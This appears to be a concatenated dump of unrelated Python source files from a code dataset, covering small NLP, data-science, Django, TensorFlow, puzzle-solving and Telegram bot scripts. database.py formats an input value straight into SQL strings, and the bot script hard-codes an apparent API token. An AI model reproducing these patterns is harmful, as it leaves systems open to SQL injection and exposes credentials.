{'python':10}\ntemplate={'experience':[\"I worked at SAP for almost 3 years. While working there, I worked with fortune 500 companies like Coca-cola as a development support engineer by helping them with customization and consulting issues.\"],\n\t\t\t'data':[\"In my academic years, I completed many projects involving data cleansing, plotting, simulation and extrapolation using Matlab and Python.\",\n\t\t\t\"I obtained my certificate offered by Microsoft in \\\"Programming with Python for Data Science\\\" where I practiced with real datasets and real problem and achieved 91% upon obtaining the certificate.\"],\n\t\t\t'analytic':[\"I also applied data analysis to the sales data of a local business I owned and came up with new promotion based on the model. This new strategy has led to a 30% increment in the monthly revenue.\"],\n\t\t\t'degree':[\"I graduated from Queen's University in Canada with a degree of Specialization in Biomedical Computing.\"]}\n\n#tokenize into sentences and then words\nsents = sent_tokenize(data)\nwords = []\nfor s in sents:\n\twords += word_tokenize(s)\n\n#filter words \nfiltered_words = []\nwords = [w.lower() for w in words]\nfor w in words:\n\tw = lemma.lemmatize(w);\n\tif w not in string.punctuation and w not in jobDesStopWords:\n\t\tfiltered_words.append(w)\n#print (unlemmatized)\n#print(filtered_words)\n\nfdist = FreqDist(filtered_words)\ntop_200 = fdist.most_common(200)\n\n\n'''\nprint(top_200)\ntest=['abc','bcd'];\ntest.extend(['efg']*10);\nprint(test)\n'''\nname=input('What is your name? ')\njobPosition=input('What is your job position? ')\ncompanyName=input('What is the company\\'s name? ')\nnumbered_Top200 = []\nfor i in range(0,len(top_200)):\n\tnumberedkword=str(i+1)+\" \"+str(top_200[i][0])\n\tprint(numberedkword)\n\t#numbered_Top200.append(str(i+1)+\". \"+str(top_200[i][0]))\n#print(numbered_Top200);\nkeywords=input('Please select select the corresponding number for the word separated by comma with no space. ');\nkeywords=keywords.split(',');\ntextbody=\"\";\nfor s in keywords:\n\tkeyword=top_200[int(s)-1][0]\n\tif keyword in template:\n\t\ttextbody=textbody+(template[keyword][0])+\" \"\n\telse:\n\t\tprint(\"keyword {0} is not in template, please fix your template\".format(keyword));\n\ncoverletter=(\"Dear Recruiting Manager, \\nMy name is \" +name+\", I am writing this letter to express my interest in the \"+jobPosition+\" position available at \"+companyName+\n\t \". As I thoroughly reading through the job description, I feel that with my knowledge and experience, I will be an excellent candidate for this position.\\n\"+ textbody +\n\t\t\"\\nI am a person who likes to be challenged and to be given responsibility. It would be my pleasure to grow together alongside with the company. With all my unique \"+\n\t\t\"experience and technical backgrounds, I believe I am a great candidate for this \"+jobPosition+\" position. \\nI therefore hope we could have the chance to discuss about \"+\n\t\t\"this opportunity further in an interview session.\\nSincerely, \\n\\n\"+name)\nprint(coverletter)\n\n\n\n","sub_path":"NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"18821818","text":"import re\nimport collections\nimport itertools\nimport math\nimport operator\n\nMAX_ROUNDS = 500\n\ndef magnitude(seq):\n return sum(map(abs, seq))\n\ndef get_data():\n data = []\n with open(\"20_input.txt\") as file:\n for line in file:\n d = {}\n for part in line.split(\", \"):\n m = re.match(r\"(.)=<(-?\\d+),(-?\\d+),(-?\\d+)>\", part)\n key, *vals = m.groups()\n d[key] = list(map(int,vals))\n data.append(d)\n return data\n\ndef tick(data):\n for d in data:\n for i in range(3):\n d[\"v\"][i] += d[\"a\"][i]\n d[\"p\"][i] += d[\"v\"][i]\n\ndef intersection(a, b):\n \"\"\"\n given particles a and b, \n returns the first non-negative integer time that they will collide, \n or None if they don't collide at a non-negative integer time.\n \"\"\"\n\n def is_perfect_square(x):\n root = int(math.sqrt(x))\n return root**2 == x\n\n def quadratic_for_ints(a,b,c):\n \"\"\"returns a list of integer solutions\"\"\"\n if a == 0:\n if b == 0:\n if c == 0:\n #nasty hack: there are infinite solutions,\n #but we can't return an infinite list,\n #so just return this sentinel value.\n return [float(\"inf\")]\n else:\n return []\n else:\n if c%b != 0: return []\n return [-c//b]\n x = b**2 - 4*a*c\n if x < 0 or not is_perfect_square(x):\n return []\n ops = (operator.add, operator.sub)\n numerators = [op(-b, int(math.sqrt(x))) for op in ops]\n integer_results = [x // (2*a) for x in numerators if x % (2*a) == 0]\n return [x for x in integer_results if x>=0]\n\n if a == b:\n return 0\n\n candidates = []\n for i in range(3):\n da = b[\"a\"][i]-a[\"a\"][i]\n dv = b[\"v\"][i]-a[\"v\"][i]\n dp = b[\"p\"][i]-a[\"p\"][i]\n times = quadratic_for_ints(\n da,\n da + 2*dv,\n 2*dp\n )\n if float(\"inf\") not in times:\n candidates.append(set(times))\n candidates = set.intersection(*candidates)\n candidates = [t for t in candidates if t > 0]\n return min(candidates) if candidates else None\n\n#part 1\n#todo: find solution for this that doesn't assume the answer can be found within MAX_ROUNDS ticks\ndata = get_data()\nfor round in range(MAX_ROUNDS):\n tick(data)\nclosest = min(data, key=lambda d: magnitude(d[\"p\"]))\nprint(data.index(closest))\n\n#part 2\ndata = get_data()\n#find all potential collisions, keyed by time\ncollisions = collections.defaultdict(set)\nfor i in range(len(data)):\n for j in range(i+1, len(data)):\n t = intersection(data[i],data[j])\n if t:\n collisions[t].add(i)\n collisions[t].add(j)\n\n#not all of those possible collisions are necessarily real;\n#if particles 0 and 1 collide at time T=23,\n#then a projected collision of particles 0 and 2 at time T=42 won't occur.\n#so let's iterate through these in time order and track which ones actually happen.\ndestroyed = set()\nfor k, v in sorted(collisions.items()):\n undestroyed_particles = [idx for idx in v if idx not in destroyed]\n if len(undestroyed_particles) >= 2:\n destroyed.update(set(v))\nprint(len(data) - len(destroyed))\n","sub_path":"day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"591255518","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bulls', '0004_auto_20160522_1406'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='game',\n options={'verbose_name': 'peli', 'verbose_name_plural': 'pelit'},\n ),\n migrations.AddField(\n model_name='player',\n name='player_id',\n field=models.CharField(max_length=128, null=True, verbose_name='id', blank=True),\n ),\n ]\n","sub_path":"bulls/migrations/0005_auto_20160522_1420.py","file_name":"0005_auto_20160522_1420.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"383191638","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.engine.url import URL\n\ndistrict_table_map = {'vps': 'vancouver', 'wcpss': 'wake'}\n\ndef connect(settings):\n \"\"\"\n Performs database connection using database settings from the environmental variable 'edu_db_string'.\n Connection URL is formatted as: postgresql://<username>:<password>@<host>/<database>\n Returns SQLAlchemy Engine instance.\n \"\"\"\n try:\n engine = create_engine(URL(**settings))\n # Test database connection.\n connection = engine.connect()\n connection.close()\n return engine\n except Exception as e:\n e.args = (\"Could not initialize database because: \" + e.args[0],)\n raise e\n\n\ndef get_summary_features(settings, summary_hash, schema=None):\n schema = district_table_map[schema]\n engine = connect(settings)\n conn = engine.raw_connection()\n cur = conn.cursor()\n sql = \"SELECT * FROM {}.summary WHERE summary_hash='{}'\".format(schema, summary_hash)\n cur.execute(sql)\n summary = cur.fetchone()\n if summary:\n sql = \"SELECT * FROM {}.results WHERE summary_id='{}'\".format(schema, summary_hash)\n results = cur.execute(sql)\n cur.close()\n conn.close()\n return results\n else:\n cur.close()\n conn.close()\n return False\n","sub_path":"python_hylas/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"374096461","text":"import tensorflow as tf\n\n# add a version to this graph\ntf.constant(\"0.1.0\", name=\"version\")\n\n# inputs:\nbuff_1 = tf.placeholder(dtype=tf.float64, name=\"buff1\")\nshape_1 = tf.placeholder(dtype=tf.int64, name=\"shape1\")\n\nbuff_2 = tf.placeholder(dtype=tf.float64, name=\"buff2\")\nshape_2 = tf.placeholder(dtype=tf.int64, name=\"shape2\")\n\nshape_b = tf.placeholder(dtype=tf.int64, name=\"shapeBegin\")\nshape_s = tf.placeholder(dtype=tf.int64, name=\"shapeSize\")\n\n# inverse\ninv = tf.reshape(buff_1, shape=shape_1)\ninv = tf.linalg.inv(inv)\ninv = tf.reshape(inv, shape=[-1], name=\"inv\")\n\n# transpose\ntranspose = tf.reshape(buff_1, shape=shape_1)\ntranspose = tf.linalg.transpose(transpose)\ntranspose = tf.reshape(transpose, shape=[-1], name=\"transposeOp\")\n\n# qr decomposition\nqr = tf.reshape(buff_1, shape=shape_1)\nq, r = tf.linalg.qr(qr, full_matrices=False)\nq = tf.reshape(q, shape=[-1])\nr = tf.reshape(r, shape=[-1])\ntf.identity(q, name=\"qrdecomp_q\")\ntf.identity(r, name=\"qrdecomp_r\")\n\n# create matrix\nmat_zeros = tf.zeros(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_zeros, shape=[-1], name=\"zeros\")\n\nmat_ones = tf.ones(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_ones, shape=[-1], name=\"ones\")\n\nmat_rand = tf.random_uniform(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_rand, shape=[-1], name=\"rand\")\n\nmat_randn = tf.random_normal(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_rand, shape=[-1], name=\"randn\")\n\n# matrix multiply\nmat_x = tf.reshape(buff_1, shape=shape_1)\nmat_y = tf.reshape(buff_2, shape=shape_2)\nmat_xy = tf.matmul(mat_x, mat_y)\ntf.shape(mat_xy, out_type=tf.int64, name=\"mulShape\")\ntf.reshape(mat_xy, shape=[-1], name=\"mul\")\n\n# matrix slice\nmat_s = tf.reshape(buff_1, shape=shape_1)\nmat_s = tf.slice(mat_s, begin=shape_b, size=shape_s)\nmat_s_shape = tf.shape(mat_s, out_type=tf.int64)\ntf.identity(mat_s_shape, name=\"sliceShapeOp\")\nmat_s =tf.reshape(mat_s, shape=[-1])\ntf.identity(mat_s, name=\"sliceOp\")\n\n# matrix reshape\nmat_reshape = tf.reshape(buff_1, shape=shape_1)\nmat_reshape = tf.reshape(mat_reshape, shape=shape_2)\nmat_reshape = tf.reshape(mat_reshape, shape=[-1])\ntf.identity(mat_reshape, name=\"reshapeOp\")\n\n# matrix repeat aka tile\nmat_tiled = tf.reshape(buff_1, shape=shape_1)\nmat_tiled = tf.tile(mat_tiled, multiples=shape_2)\nmat_tiled_shape = tf.shape(mat_tiled, out_type=tf.int64)\ntf.identity(mat_tiled_shape, name=\"tileShapeOp\")\nmat_tiled =tf.reshape(mat_tiled, shape=[-1])\ntf.identity(mat_tiled, name=\"tileOp\")\n\n# finally save the graph to be used in Go code\ngraph = tf.Session().graph_def\ntf.io.write_graph(graph, \"./model\", \"graph.pb\", as_text=False)\n\nwith tf.Session() as sess:\n tf.summary.FileWriter(logdir=\"/tmp/tensorflow/mat\", graph=sess.graph)\n\nprint(\"run 'tensorboard --logdir=/tmp/tensorflow' to view the graph\")\n","sub_path":"mat/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439081511","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport functools\n\nimport numpy as np\nimport tensorflow as tf\n\nTRAIN_DATA=\"heart_train.csv\"\nTEST_DATA=\"heart_test.csv\"\n\n\nnp.set_printoptions(precision=3, suppress=True)\n\nLABEL_COLUMN = 'chd'\nLABELS = [0, 1]\n\ndef get_dataset(file_path, **kwargs):\n dataset = tf.data.experimental.make_csv_dataset(\n file_path,\n batch_size=10, # Artificially small to make examples easier to show.\n label_name=LABEL_COLUMN,\n na_value=\"?\",\n num_epochs=1,\n ignore_errors=True, \n **kwargs)\n return dataset\n\nSELECT_COLUMNS = ['sbp','tobacco','ldl','adiposity','famhist', 'typea','obesity','alcohol','age','chd']\nraw_train_data = get_dataset(TRAIN_DATA,select_columns=SELECT_COLUMNS)\nraw_test_data = get_dataset(TEST_DATA,select_columns=SELECT_COLUMNS)\n\n\ndef show_batch(dataset):\n for batch, label in dataset.take(1):\n for key, value in batch.items():\n print(\"{:20s}: {}\".format(key,value.numpy()))\n\n\n\n\ntrain_batch,label_batch = next(iter(raw_train_data))\ntest_batch,label_batch = next(iter(raw_test_data))\n\ndef pack(features, label):\n return tf.stack(list(features.values()), axis=-1), label\n\n\nclass PackNumericFeatures(object):\n def __init__(self,names):\n self.names=names\n\n def __call__(self, features, labels):\n numeric_features = [features.pop(name) for name in self.names]\n numeric_features = [tf.cast(feat, tf.float32) for feat in numeric_features]\n numeric_features = tf.stack(numeric_features, axis=-1)\n features['numeric'] = numeric_features\n\n return features, labels\n\nNUMERIC_FEATURES = ['sbp','tobacco','ldl','adiposity','typea','obesity','alcohol','age']\n\n\n\npacked_train_data = raw_train_data.map(\n PackNumericFeatures(NUMERIC_FEATURES))\n\npacked_test_data = raw_train_data.map(\n PackNumericFeatures(NUMERIC_FEATURES))\n\nshow_batch(packed_train_data)\n\n\n\ntrain_batch,label_batch = next(iter(packed_train_data))\ntest_batch,label_batch = next(iter(packed_test_data))\n\nimport pandas as pd\ndesc = pd.read_csv(TRAIN_DATA)[NUMERIC_FEATURES].describe()\nprint(desc)\n\nMEAN = np.array(desc.T['mean'])\nSTD = np.array(desc.T['std'])\n\ndef normalize_numeric_data(data, mean, std):\n # Center the data\n return (data-mean)/std\n\nnormalizer = functools.partial(normalize_numeric_data, mean=MEAN, std=STD)\n\nnumeric_column = tf.feature_column.numeric_column('numeric', normalizer_fn=normalizer, shape=[len(NUMERIC_FEATURES)])\nnumeric_columns = [numeric_column]\nnumeric_column\n\ntrain_batch['numeric']\n\nnumeric_layer = tf.keras.layers.DenseFeatures(numeric_columns)\nnumeric_layer(train_batch).numpy()\n\n\nCATEGORIES = {\n 'famhist': ['Present', 'Absent']\n\n}\n\ncategorical_columns = []\nfor feature, vocab in CATEGORIES.items():\n cat_col = tf.feature_column.categorical_column_with_vocabulary_list(\n key=feature, vocabulary_list=vocab)\n categorical_columns.append(tf.feature_column.indicator_column(cat_col))\n\nprint(categorical_columns)\n\ncategorical_layer = tf.keras.layers.DenseFeatures(categorical_columns)\npreprocessing_layer = tf.keras.layers.DenseFeatures(categorical_columns+numeric_columns)\n\n\n\n\nmodel = tf.keras.Sequential([\n preprocessing_layer,\n tf.keras.layers.Dense(120, activation='relu'),\n tf.keras.layers.Dropout(0.3),\n tf.keras.layers.Dense(60, activation='relu'),\n tf.keras.layers.Dropout(0.3),\n tf.keras.layers.Dense(1, activation='sigmoid'),\n\n])\n\nmodel.compile(\n loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\ntraining_data=packed_train_data.shuffle(500)\ntesting_data=packed_test_data\n\nprint(\"--Fit model--\")\nmodel.fit(training_data, epochs=100)\n\nprint(\"--Testing Results--\")\nmodel_loss, model_accuracy = model.evaluate(testing_data,verbose=2)\nprint(f\"Model Loss: {model_loss:.2f}\")\nprint(f\"Model Accuray: {model_accuracy*100:.1f}%\")\n\n\n\n\n\n\n\n\n\n","sub_path":"CHD/CHDModel.py","file_name":"CHDModel.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"175788642","text":"\n\nfrom xai.brain.wordbase.nouns._cavalry import _CAVALRY\n\n#calss header\nclass _CAVALRIES(_CAVALRY, ):\n\tdef __init__(self,): \n\t\t_CAVALRY.__init__(self)\n\t\tself.name = \"CAVALRIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cavalry\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cavalries.py","file_name":"_cavalries.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"294079574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 21:29:18 2021\n\n@author: user\n\"\"\"\n\n#for number in range(1, 13):\n # print(number)\n#vowels = 0\n#consonants = 0 \n \n#for letter in \"Hello\":\n # if letter.lower() in \"aeiou\":\n # vowels = vowels + 1\n # elif letter == \" \":\n # pass\n #else:\n # consonants = consonants + 1\n#print(\"There are {} vowels\".format(vowels))\n#print(\"There are {} consonants\".format(vowels))\n\n\n\n#students = {\n # \"male\": [\"AlYahu\", \"Ban\"],\n ## }\n\n#for key in students.keys():\n # for name in students[key]:\n # if \"a\" in name:\n # print(name)\n # \n \n#even_number = [x for x in range(1,101) if x %2 == 0]\n#print(even_numbers)\n\n#get sentence from user\n\norginial = input(\"Please enter a sentence: \").lower().strip()\n\n#split sentence into words\nwords = orginial.split()\nprint(words)\n\n#loop though words and convert to pig latin\n\nnew_words = []\n\n#if starts with vowel, just add \"yay\"\nfor word in words:\n if word[0] in \"aeiou\":\n new_word = word + \"yay\"\n new_words.append(new_word)\n else:\n vowel_pos = 0\n for letter in word:\n if letter not in \"aeiou\":\n vowel_pos = vowel_pos + 1\n else:\n break\n #Slice\n cons = word[:vowel_pos]\n the_rest = word[vowel_pos:]\n new_word = the_rest + cons + \"ay\"\n new_words.append(new_word)\n\n#Otherwise, move the first consonant cluster to end, and add \"ay\"\n\n#stick words back together\noutput = \" \".join(new_words)\n\n#output the final string\nprint(output)","sub_path":"piglatintranslator.py","file_name":"piglatintranslator.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"436339923","text":"from django.conf.urls import patterns, url\nfrom automaticPort.views import *\n\nurlpatterns = patterns('',\n url(r'^cadastro/$', Cadastro.as_view(), name='cadastroUsuario'),\n url(r'^ativacadastro/(?P<chaveAtivacao>.+)/$', AtivaCadastro.as_view(), name='ativaCadatro'),\n\n url(r'^perfil/$', Perfil.as_view(), name='perfil'),\n url(r'^editarperfil/(?P<user_id>\\d+)/$', Perfil.as_view(), name='editarPerfil'),\n\n url(r'^recuperarsenha/$', RecuperarSenha.as_view(), name='emailRecuperarSenha'),\n url(r'^recuperarsenhachave/(?P<chaveAtivacao>.+)/$', RecuperarSenha.as_view(), name='recuperarSenha'),\n\n url(r'^emailativacao/$', EmailAtivacao.as_view(), name='emailAtivacao'),\n url(r'^faleconosco/$', FaleConosco.as_view(), name='faleConosco'),\n\n url(r'^login/$', Login.as_view(),name='login'),\n url(r'^suporte/$', Suporte.as_view(),name='suporte'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'usuario/logout/logout.html', 'extra_context': {'controleMenu': 'logout'}}, name='logout'),\n )","sub_path":"automaticPort/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"230009547","text":"from tkinter import *\r\n\r\n\r\ndef addtolist():\r\n projectlist = [entry.get(), entry1.get(), entry2.get(), entry3.get()]\r\n print(projectlist)\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"450x300\")\r\n\r\nlabel = Label(root, text=\"Employees I.D. number: \")\r\nlabel.place(x=40, y=0)\r\nentry = Entry(bd=5)\r\nentry.place(x=250, y=0)\r\n\r\nlabel1 = Label(root, text=\"Name of your project: \")\r\nlabel1.place(x=40, y=40)\r\nentry1 = Entry(bd=5)\r\nentry1.place(x=250, y=40)\r\n\r\nlabel2 = Label(root, text=\"Team lead on project: \")\r\nlabel2.place(x=40, y=80)\r\nentry2 = Entry(bd=5)\r\nentry2.place(x=250, y=80)\r\n\r\nlabel3 = Label(root, text=\"Time spent on project this week: \")\r\nlabel3.place(x=40, y=120)\r\nentry3 = Entry(bd=5)\r\nentry3.place(x=250, y=120)\r\n\r\nsubmit = Button(root, text=\"Submit\", command = addtolist)\r\nsubmit.place(x=150, y=160)\r\n\r\nroot.mainloop()\r\n\r\n","sub_path":"projectCenter.py","file_name":"projectCenter.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301714862","text":"__author__ = 'ankhbold'\n\nfrom sqlalchemy import Column, Integer, String, Date, Sequence, ForeignKey, DateTime\nfrom CaParcel import *\n\nclass VaInfoHomeBuilding(Base):\n\n __tablename__ = 'va_info_building'\n\n id = Column(Integer, primary_key=True)\n building_id = Column(String)\n area_m2 = Column(Float)\n price = Column(Float)\n floor = Column(Integer)\n room = Column(Integer)\n status_year = Column(DateTime)\n construction_year = Column(DateTime)\n\n #foreign keys:\n register_no = Column(String, ForeignKey('va_info_parcel.register_no'))\n register_no_ref = relationship(\"VaInfoHomeParcel\")\n\n landuse_building = Column(Integer, ForeignKey('cl_type_landuse_building.code'))\n landuse_building_ref = relationship(\"VaTypeLanduseBuilding\")\n\n stove_type = Column(Integer, ForeignKey('cl_type_stove.code'))\n stove_type_ref = relationship(\"VaTypeStove\")\n\n material_type = Column(Integer, ForeignKey('cl_type_material.code'))\n material_type_ref = relationship(\"VaTypeMaterial\")\n\n design_type = Column(Integer, ForeignKey('cl_type_design.code'))\n design_type_ref = relationship(\"VaTypeDesign\")\n\n heat_type = Column(Integer, ForeignKey('cl_type_heat.code'))\n heat_type_ref = relationship(\"VaTypeHeat\")\n\n building_status = Column(Integer, ForeignKey('cl_type_status_building.code'))\n building_status_ref = relationship(\"VaTypeStatusBuilding\")\n\n building_esystem = Column(Integer, ForeignKey('cl_type_engineering_system.code'))\n building_esystem_ref = relationship(\"VaTypeESystem\")\n","sub_path":"model/VaInfoHomeBuilding.py","file_name":"VaInfoHomeBuilding.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"590031833","text":"import knapsack\nimport traceback\nimport re\nfrom dynamic_programming import DynamicProgramTable\n\ndef test_knapsack(testcase):\n outputString = \"\"\n testname, items, W, included_items, total_value = testcase\n\n # Set up the dynamic programming table.\n D = DynamicProgramTable(len(items) + 1, W + 1, knapsack.cell_ordering(items, W), knapsack.fill_cell)\n\n try:\n D.fill(items=items, W=W)\n except:\n outputString += \"Exception encountered when filling dynamic-programming table:\\n\"\n outputString += traceback.format_exc()\n return outputString\n\n try:\n (res_included_items, res_total_value) = knapsack.knapsack_from_table(items,W,D)\n except:\n outputString += \"Exception encountered when running diff_from_table:\\n\"\n outputString += traceback.format_exc()\n return outputString\n\n for x in included_items:\n if not x in res_included_items:\n outputString += \"Output list should have included %s but did not\\n\"%str(x)\n\n for x in res_included_items:\n if not x in included_items:\n outputString += \"Output list included %s but should not have\\n\"%str(x)\n\n if res_total_value != total_value:\n outputString += \"Total value output was %s but should've been %s\\n\"%(res_total_value,total_value)\n\n return outputString\n\ndef stringToList(input):\n output = []\n tuples = input.strip(\"[()]\").split(\"), (\")\n if tuples == ['']:\n return []\n for i in tuples:\n vw = i.split(\", \")\n output.append((int(vw[0]), int(vw[1])))\n return output\n\nwith open(\"knapsack_tests.txt\", 'r') as testfile:\n L = testfile.readlines()\n num_tests_run = 0\n num_failed_tests = 0\n for l in L:\n (testname, items, W, included_items, total_value) = l.strip().split(\";\")\n testcase = (testname, stringToList(items), int(W), stringToList(included_items), int(total_value))\n test_result = test_knapsack(testcase)\n num_tests_run += 1\n if len(test_result) > 0:\n print(\"Failed test with name %s\" % testname)\n print(test_result)\n num_failed_tests += 1\n\nprint(\"Ran %d tests\"%num_tests_run)\nprint(\"Failed %d tests\"%num_failed_tests)\n","sub_path":"HW4/test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301732270","text":"from decimal import Decimal\n\nfrom ..base import APITestCase\n\n\nclass TestGetAvailableCurrencies(APITestCase):\n def test_successful_request(self):\n response = self.client.get('/api/getAvailableCurrencies/')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data, [\n {'code': c, 'name': c, 'contract_address': '0x0000000000000000000000000000000000000000', 'rate': Decimal('1')}\n for c in ['DAI', 'USDC', 'USDT', 'TUSD']\n ])\n","sub_path":"user_office/tests/api/test_get_available_currencies.py","file_name":"test_get_available_currencies.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"155917235","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as pl\npl.rcParams['font.family'] = 'stixgeneral'\nfrom matplotlib.ticker import MaxNLocator\nfrom astropy.table import Table\nimport json\nfrom scipy import constants\n\n#\ndef interp_json(infil,fit_cmp):\n\n #infil = '../../data/J1534+5015_model.json'\n #fit_cmp = 'z-0.00005_NaI'\n\n with open(infil) as data_file:\n data=json.load(data_file)\n\n systems=['z0.00000_MW']\n #components=[]\n\n cmp_dict = 0\n for cmp in data[\"cmps\"]:\n systems.append(str(cmp))\n #print(data[\"cmps\"][str(cmp)]['wrest'])\n if(fit_cmp == str(cmp)):\n cmp_dict=data[\"cmps\"][str(cmp)]\n\n if(cmp_dict==0):\n print(\"Your selected system is not in this json file!\")\n print(\"Pick one of the following:\")\n print(systems)\n\n #cmp_data+=str(cmp)+';'\n #cmp_data+=str(cmp_dict[\"Reliability\"])+';'\n #if cmp_dict[\"Comment\"]=='':\n # cmp_data+='None;'\n #else:\n # cmp_data+=str(cmp_dict[\"Comment\"])+';'\n #cmp_data+=str(cmp_dict[\"Nfit\"])+';'\n #cmp_data+=str(cmp_dict[\"bfit\"])+';'\n #components.append(cmp_data)\n #print(cmp_dict['zfit'])\n #print(cmp_dict['vlim'])\n\n if(cmp_dict==0):\n return {'zfit':0.0, 'vlim':0.0, 'Nfit':0.0, 'bfit':0.0}\n else:\n \n zfit = cmp_dict['zfit']\n vlim = cmp_dict['vlim']\n Nfit = cmp_dict['Nfit']\n bfit = cmp_dict['bfit']\n\n lam0 = (1.0+zfit)*cmp_dict['wrest']\n lam0red = (1.0+zfit)*5897.5581\n\n print(\"igm_guesses results for this component:\")\n print(lam0,lam0red,cmp_dict['Nfit'],cmp_dict['bfit']) \n #print(cmp_dict.keys()) \n print(\"All systems in json file:\")\n print(systems)\n #print(components)\n\n \n return {'zfit':zfit, 'vlim':vlim, 'Nfit':Nfit, 'bfit':bfit}\n","sub_path":"interp_json.py","file_name":"interp_json.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"106986438","text":"\"\"\"\nService base class\n\"\"\"\n\n# pylint: disable=too-few-public-methods\n\n# stdlib\nfrom socket import gaierror\nfrom typing import Any, Optional, Tuple\n\n# library\nimport httpx\nimport httpcore\n\n# module\nfrom avwx.exceptions import SourceError\n\n_VALUE_ERROR = \"'{}' is not a valid report type for {}. Expected {}\"\n\n\nclass Service:\n \"\"\"Base Service class for fetching reports\"\"\"\n\n url: Optional[str] = None\n report_type: str\n _valid_types: Tuple[str, ...] = tuple()\n\n def __init__(self, report_type: str):\n if self._valid_types:\n if report_type not in self._valid_types:\n raise ValueError(\n _VALUE_ERROR.format(\n report_type, self.__class__.__name__, self._valid_types\n )\n )\n self.report_type = report_type\n\n\nclass CallsHTTP:\n \"\"\"Service supporting HTTP requests\"\"\"\n\n method: str = \"GET\"\n\n async def _call(\n self,\n url: str,\n params: dict = None,\n headers: dict = None,\n data: Any = None,\n timeout: int = 10,\n ) -> str:\n name = self.__class__.__name__\n try:\n async with httpx.AsyncClient(timeout=timeout) as client:\n if self.method.lower() == \"post\":\n resp = await client.post(\n url, params=params, headers=headers, data=data\n )\n else:\n resp = await client.get(url, params=params, headers=headers)\n if resp.status_code != 200:\n raise SourceError(f\"{name} server returned {resp.status_code}\")\n except (\n httpx.ConnectTimeout,\n httpx.ReadTimeout,\n httpcore.ReadTimeout,\n ) as timeout_error:\n raise TimeoutError(f\"Timeout from {name} server\") from timeout_error\n except (gaierror, httpcore.ConnectError, httpx.ConnectError) as connect_error:\n raise ConnectionError(\n f\"Unable to connect to {name} server\"\n ) from connect_error\n except httpcore.NetworkError as network_error:\n raise ConnectionError(\n f\"Unable to read data from {name} server\"\n ) from network_error\n return resp.text\n","sub_path":"avwx/service/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"130637550","text":"\nimport logging\nfrom Database import *\nfrom telebot import *\n\nbot = TeleBot(\"549806791:AAHdVNTdoW-f9_350AzF9zS3Vmqtyk9Fi_Y\")\n\n@bot.message_handler(commands=[\"check\"])\ndef hello(message):\n print(message)\n bot_markup = types.InlineKeyboardMarkup()\n btn_set_Review = types.InlineKeyboardButton(text=\"Оставить отзыв\", url=\"https://habrhabr.ru\")\n bot_markup.add(btn_set_Review)\n bot.send_message(message.chat.id, \"Проверка\", reply_markup = bot_markup)\n\n@bot.message_handler(content_types=[\"contact\"])\ndef newContact(message):\n DataBase().newSubscriber(message.from_user.id, message.contact.user_id)\n #DataBase().getSubscribes(message.from_user.id)\n\n@bot.message_handler(commands=[\"myfriends\"])\ndef getSubs(message):\n subs = DataBase().getSubscribes(message.from_user.id)\n bot.send_message(message.chat.id, \"Ваши друзья: \" + str(subs))\n\n\nbot.polling()\n\n\n\"\"\"class DataBase():\n def __init__(self):\n self.connection = sqlite3.conntect(\"test.db\")\n self.cursor = self.connection.cursor()\n\n def _createTables(self):\n self.cursor.executeCREATE TABLE IF NOT EXIST users (\n user_id INT,\n subscribed_to_user_id 